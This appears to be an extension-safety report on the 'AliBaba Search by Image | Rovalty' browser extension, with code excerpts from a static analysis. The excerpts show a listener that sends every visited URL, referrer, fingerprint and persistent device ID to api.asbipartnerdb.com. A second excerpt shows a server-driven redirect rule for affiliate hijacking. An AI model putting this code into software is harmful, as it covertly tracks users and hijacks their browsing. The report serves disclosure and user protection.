Is AliBaba Search by Image | Rovalty safe?
AliBaba Search by Image | Rovalty sends every page you visit, plus a persistent device ID, to a third-party server on each load.
The extension watches every GET request for the pages you visit and reports the full URL, referrer, browser and platform details, and a UUID that stays the same across sessions to api.asbipartnerdb.com. This runs on every site, all the time, independent of the image-search feature the extension is actually for. That server's response can also remotely activate a redirect that sends your next visit to a domain to a server-supplied address, a capability that is not disclosed anywhere in the extension's listing or UI.
Who publishes itUpstal - 1 other listing from the same operator, none carrying a finding
Upstal - 1 other listing from the same operator, none carrying a finding
What this publisher told the store about itself, and the other listings that told it the same thing.
Same store account
1 other listing published from this account, 8k+ users between them, none of them carrying a finding.
Shared hosts - 1 hostname
Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
AliBaba Search by Image reports every page you visit to an unrelated domain
Code analysis shows the extension reads a persistent device UUID from IndexedDB and sends it with the full URL of every page you load, on every site, to api.asbipartnerdb.com/check.
You navigate the top-level tab to any website.
The extension's background script reads your device UUID and sends the full page URL to api.asbipartnerdb.com/check.
This runs on every top-level page load, on every domain, independent of the image-search feature.
| Field | Value | Why it matters | |
|---|---|---|---|
The page you're on | https://www.example-bank.com/accounts/summary | The exact URL of every page you load is sent, including pages with no relation to shopping or image search. | |
Your device ID | 0b8f2b34-9e3c-4b8a-9a70-6a2b7e0dcb61 | A UUID generated once and stored forever ties every visit you make back to this one installation. | |
Referring page | https://www.google.com/search?q=running+shoes | The page you came from, such as a search result or link, is also sent. | |
Browser and device details | Chrome 128 on Windows, locale en-US | Your browser version, operating system and language are attached to every visit record. |
The navigation listener that reports every page you visit
chrome.webRequest.onBeforeSendHeaders.addListener(function (details) {
const isTopLevelGet =
!details.documentId &&
details.method === 'GET' &&
details.parentFrameId === -1 &&
details.type === 'main_frame';
if (!isTopLevelGet) return;
const visitedUrl = new URL(details.url);
const req = indexedDB.open('ASBIPARTNERDB', 2);
req.onsuccess = (event) => {
const db = event.target.result;
const tx = db.transaction('ASBIuids', 'readonly');
const getReq = tx.objectStore('ASBIuids').get(1);
let deviceUuid = '';
getReq.onsuccess = (e) => {
deviceUuid = e.target.result ? e.target.result.uuid : '';
};
tx.oncomplete = async () => {
db.close();
const payload = {
timestamp: Date().toLocaleString(),
uri: details.url,
domain: visitedUrl.hostname,
title: '',
referer: details.initiator,
locale: navigator.language,
user_agent: navigator.userAgent,
platform: navigator.platform,
vendor: navigator.vendor,
user_id: deviceUuid,
};
const response = await fetch('https://api.asbipartnerdb.com/check', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(payload),
});
// response used by a companion capability, see code_compare above
};
};
}, { urls: ['<all_urls>'] });- api.asbipartnerdb.com
Receives the URL, referrer, device UUID and browser fingerprint of every page load. Unbranded domain, unaffiliated with alibaba.com or rovalty.com per the listing.
Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.
A server-supplied rule can redirect your next visit to a partner-flagged site
Code analysis shows that if the beacon response marks a site as an active affiliate partner, the extension installs a redirect rule that sends your next request there to a server-chosen URL.
The server's response to the per-visit beacon marks the site you just loaded as an active affiliate partner with a redirect pattern.
The extension installs a declarativeNetRequest rule that rewrites your next request to that site using the server-supplied pattern.
This redirect capability is not mentioned in the extension's description or its user interface.
| Field | Value | Why it matters | |
|---|---|---|---|
Partner match flag | match: true (illustrative) | Tells the extension whether the site you're on currently qualifies for a redirect. | |
Active date window | startdate 2026-01-01, enddate 2026-12-31 (illustrative) | A start and end date decide when the redirect capability is live for this site. | |
Redirect pattern | https://partner-affiliate.example/track?dest=$1 (illustrative) | A regex substitution supplied by the server decides where your browser actually lands. |
The redirect rule installed from the server's response
const beaconResponse = await (await fetch('https://api.asbipartnerdb.com/check', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(payload),
})).json();
if (
beaconResponse &&
beaconResponse.match &&
beaconResponse.partner &&
beaconResponse.partner.startdate &&
beaconResponse.partner.enddate &&
beaconResponse.partner.partnertype === 'AFFILIATE'
) {
const now = new Date();
const start = new Date(...beaconResponse.partner.startdate.split('-'));
const end = new Date(...beaconResponse.partner.enddate.split('-'));
if (start < now && now < end && beaconResponse.partner.regex) {
chrome.declarativeNetRequest.updateSessionRules({
addRules: [{
id: 4,
priority: 1,
action: { type: 'redirect', redirect: { regexSubstitution: beaconResponse.partner.regex } },
condition: { urlFilter: '||' + visitedUrl.hostname, resourceTypes: ['main_frame'] },
}],
removeRuleIds: [1],
});
}
}No live partner-match response was seen during static review; this describes the code path that acts on one, not a confirmed live redirect. Whether it fires for a given site depends on data behind the beacon endpoint we do not control.
- api.asbipartnerdb.com
Its response to the visit beacon decides which sites get a redirect rule and what URL pattern the browser is sent to.
Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.
What it can do
Permissions this extension asks for, as declared in version 3.0.1. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.
Read and change your data on every site you visit
<all_urls>
Add items to the right-click menu
contextMenus
Watch every request your browser makes
webRequest
Block and redirect the requests your browser makes
declarativeNetRequest
Where it sends data
Destinations our analysis observed AliBaba Search by Image | Rovalty contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.
- api.asbipartnerdb.com
AliBaba Search by Image | Rovalty sends data to api.asbipartnerdb.com. No other extension we have analysed sends data here.